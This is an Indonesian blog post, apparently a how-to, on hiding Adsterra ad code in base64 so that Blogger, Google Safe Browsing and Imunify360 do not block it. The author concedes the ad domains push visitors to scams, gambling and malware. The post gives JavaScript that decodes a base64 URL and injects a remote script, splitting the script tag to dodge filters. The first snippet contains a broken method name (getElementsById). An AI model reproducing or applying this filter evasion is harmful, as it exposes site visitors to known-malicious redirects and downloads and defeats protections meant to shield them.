Update anti blog terkunci iklan Adsterra di Blogger, manjur banget!

Iklan adsterra menjadi biang kerok blog terkunci

RYANID.MY.ID - adsterra di kenal dengan iklan yang berbahaya, kenapa karena iklan tersebut secara terang-terangan mengarahkan visitor ke halaman iklan palsu, halaman judi, penipuan dan program jahat yang membahayakan pengguna. Oleh karena itu sebagian domain iklan yang di gunakan oleh adsterra masuk ke dalam daftar hitam google websafe.

Google sebagai selaku pemilik blogger menggunakan database yang ada di google safe browsing guna mendeteksi konten berbahaya di platform blogger, makanya ketika kamu menulis secara terang-terangan link iklan adsterra blog akan langsung di kunci oleh blogger.

Bukan cuma blogger, saya pernah mengalami hal ini di cPanel. Cpanel otomatis di lindungi oleh software keamanan bernama imunify360, ketika saya menulis langsung sebuah kode iklan adsterra. Khususnya iklan direct link ke dalam file berbasis html, file tersebut mendadak hilang.

File hilang karena di deteksi oleh imunify360, didalamnya mengandung sebuah tautan yang sudah di laporkan berbahaya. Karena sudah mengetahui permasalahanya, saya berinisiatif menggunakan teknik lain.

Teknik ini adalah dengan menyamarkan kode iklan ke dalam string base64, dengan begitu kode iklan tidak akan terbaca oleh filter google, filter websafe. Sementara agar iklan bisa di tampilkan, kita bisa menggunakan javasacript untuk mendekodekan base64 di sisi browser.

Sampai di sini kita masih belum lulus filter, masih ada proteksi dari user yang harus kita hadapi. Jika kamu berniat memasang iklan direct link, sebaiknya perhatikan safe browsing yang ada di chrome. Domain iklan tidak akan di deteksi oleh server, tapi akan di deteksi oleh pengaman tingkat akhir user.

Program antivirus smadav akan menandai domain blog kamu sebagai berbahaya, web safety yang biasanya tertanam di pc akan memperingatkan pengguna. Jadi pakailah cara ini bila kamu benar-benar membutuhkan, resikonya domain bisa masuk juga ke dalam daftar blacklist. Setelah kamu siap, dan sudah sanggup menerima resikonya sekarang mari kita lanjut cara pasang kode iklan adstera di blog.



Langkah pasang iklan adsterra di blogger

  • Silakan salin kode iklan kamu, mau iklan apa saja bebas.
  • Gunakan tools Base64 Encode online untuk mengenkripsi kode iklan.
  • Silakan salin kode di bawah ini, untuk mendeskripsikan kode dan menampilkan iklan.

<div id="iklan_adstera"></div>
<script>
var baselink = "__Isi dengan kode iklan anda_"
document.getElementsById("iklan_adstera").innerHTML=atob(baselink);
</script>


Pada beberapa iklan yang menggunakan skrip secara langsung kita coba saja buat enkripsi url iklan, url ini menjadi biang kerok blog terkunci oleh blogger. Kebanyakan domain iklan adsterra di cap sebagai ransomware/program jahat yang berbahaya. Begini bentuk kode nya:

<script type="text/javascript">
var link_iklan = "Oi8vd3d3LmVmZmVjdGl2ZWRpc3BsYXljb250ZW50LmNvbS84YzUzNTgwNjMwY2E0ZGI2MzFkYzJiN2Y4ZjAzNzg0MC9pbnZva2UuanM=";
	atOptions = {
		'key' : '8c53580630ca4db631dc2b7f8f037840',
		'format' : 'iframe',
		'height' : 250,
		'width' : 300,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + atob(link_iklan) + '"></scr' + 'ipt>');
</script>

Jika iklan adstera dalam bentuk javascript, anda wajib memodifikasinya. Yang di enkripsi hanya links domain iklan saja, sementara kode skrip lain abaikan. Tujuan utama enkripsi adalah untuk menghindari fitur keamanan yang digunakan google, fitur keamananan ini memfilter hampir semua dokumen teks yang di tambahkan oleh user.

Tak heran kalau blog setelah memasang iklan adsterra langsung di kunci oleh Google. Adstera menjadi penyumbang program jahat yang paling saya kenal, mungkin dari teman-teman ada yang salah unduh ketika ingin menguduh file di internet? Hal tersebut di sebabkan oleh iklan adsterra.

RyanID
RyanID Scroll terus ke bawah, sampe kamu menemukan topik yang menurutmu berguna. Jangan lupa, tinggalkan komentar slur.